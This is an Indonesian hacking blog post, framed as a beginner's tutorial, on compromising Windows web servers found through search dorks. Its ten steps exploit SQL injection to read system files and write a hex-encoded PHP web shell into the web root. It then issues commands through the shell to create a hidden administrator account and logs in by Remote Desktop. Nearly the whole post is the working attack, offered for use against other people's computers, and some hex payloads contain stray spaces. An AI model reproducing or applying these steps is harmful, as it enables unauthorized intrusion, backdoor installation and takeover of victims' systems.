feedburner
Enter your email address:

Delivered by FeedBurner

feedburner count

SQL RemoteDekstop

admin indo share blog
KODE PPC ANDA

waduh mugkin ada sebagian yang sudah tahu masalah ini (SQL RemoteDekstop), jadi maaf aja yach kalau
saya sok tahu, buat para master tutor saya jangan diketawain y, maklum saya cuma script kiddie disini.
langsung aja yach, sebenarnya konsep dalam meremote dekstop dengan SQL sama saja, hanya saja ada yang
kita rubah sedikit syntak dari SQlnya.

===========
PERTAMA
===========
untuk langkah pertama, pastinya kita mencari web target yang vuln dengan sql injection, kalo masalah
pencarian dan dork saya serahkan pada kalian dan bisa bertanya pada Dosen Google,he5x, maklum tempat
kuliah w kadang diwarnet..:p

===========
KEDUA
===========
setelah mendapatkan web yang vuln dengan SQL Injection, lalu kita cari alamat IP dari web tersebut
(memudahkan kita dalam meremote dekstop,sebab dalam meremote,kita akan dimintai alamat IPnya)

===========
KETIGA
===========
nah udah dapetkan alamat IP web yang bersangkutan, setelah itu cari kolom yang bermasalahnya(Metode
SQL Injection), misalkan kita dapet kolom 1

code:
192.168.0.1/index.php?=-1+union+select+1--

kemudian cari versinya

code:
192.168.0.1/index.php?=-1+union+select+version()--

disini saya baru melakukan pada SQL yang versi 5.x

===========
KEEMPAT
===========
ganti kolom yang bermasalah dengan

code:
192.168.0.1/index.php?=-1+union+select+load_file('c:/boot.ini')--

perintah load_file('c:/boot.ini') digunakan untuk memanggil informasi boot dalam komputer korban

===========
KELIMA
===========
setelah itu kita convert

code:


kedalam bentuk Ascii, saya sudah tahu pasti pada maleskan convertnya, kalo gitu saya kasih aja hasilnya

code:
0x3c3f7068702073797374656d28245f6765745b5c27434d44 5c275d293b203f3e

===========
KEENAM
===========
ok kalo gitu sekarang kita buat file cmd.php dengan syntak SQL

code:
192.168.0.1/index.php?=-1+union+select+0x3c3f7068702073797374656d28245f6765745b5c27434d445c27 5d293b203f3e+into+dumpfile+'c:/xampp/htdocs/cmd.php'--


0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d2 93b203f3e >> conversian dari

+into+dumpfile+ >> untuk membuat file kedalam server

c:/xampp/htdocs/cmd.php >> dari pesan error SQL(tanda '' diubah menjadi '/'), kalo dapet yang pk appserv maka C:/AppServ/www/cmd.php
===========
KETUJUH
===========
ubh URL menjadi

code:
192.168.0.1/cmd.php?cmd=dir

maka akan terlihat atau keluar data-data yang ada pada drive c:/ komputer korban

===========
KEDELAPAN
===========
nih code yang w rada kurang ngerti, coz w gak ngerti dari mana asalnya, tapi w paham codenya buat apa

ketikan pada URL

code:
192.168.0.1/cmd.php?cmd=net user kiddies 12345 /add

net user kiddies 12345 /add >> perintah diatas adalah untuk membuat username dan password baru dalam system komputer


code:
192.168.0.1/cmd.php?cmd=net localgroup administrator kiddies /add

net localgroup administrator kiddies /add >> perintah ini untuk membuat username kita adalah administrator dalam system komputer

==========
KESEMBILAN
==========
ketikan pertintah pada run >> mstsc




==========
KESEPULUH
==========
komputer sudah ditangan anda, silahkan pergunakan dengan sebaik-baiknya dan bijak....







kalau cupu tutornya maaf banget dan kalau kurang lengkap POCnya w minta maaf juga, coz w sendiri ge belajar


syarat: remote pada komputer harus aktif,ok

KODE PPC ANDA

Digg Technorati del.icio.us Stumbleupon Reddit Blinklist Furl Spurl Yahoo Simpy

Related Posts by Categories



Widget by Hoctro | Jack Book

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)